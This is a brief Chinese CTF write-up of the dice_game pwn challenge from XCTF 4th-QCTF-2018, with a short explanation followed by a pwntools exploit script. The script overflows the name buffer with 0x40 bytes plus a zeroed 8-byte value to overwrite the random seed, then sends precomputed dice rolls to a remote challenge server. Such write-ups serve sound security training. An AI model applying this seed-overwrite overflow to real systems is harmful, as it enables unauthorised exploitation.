dice_game XCTF 4th-QCTF-2018
程序员文章站
2024-01-20 08:32:04
...
其实感觉这个题 不算是pwn题。。。
这 pwn 里面就是 读取flag 文件 然后我们看一下 sub_a20 这个函数
随机数啊 本来我没有想用 把种子给 覆盖掉 但是 time(0) 感觉不稳 时间一万一不对劲 那么随机数 也会出错
所以干脆 把种子固定下来
下面是 exp
#coding:utf-8
from pwn import*
lists=[2,5,4,2,6,2,5,1,4,2,3,2,3,2,6,5,1,1,5,5,6,3,4,4,3,3,3,2,2,2,6,1,1,1,6,4,2,5,2,5,4,4,4,6,3,2,3,3,6,1]
#io=process("./pwn")
io=remote('111.198.29.45',53973)
io.recvuntil("name: ")
io.sendline("a" * 0x40 + p64(0))
for i in lists:
io.recvuntil("Give me the point(1~6): ")
io.sendline(str(i))
print io.recv()
io.interactive()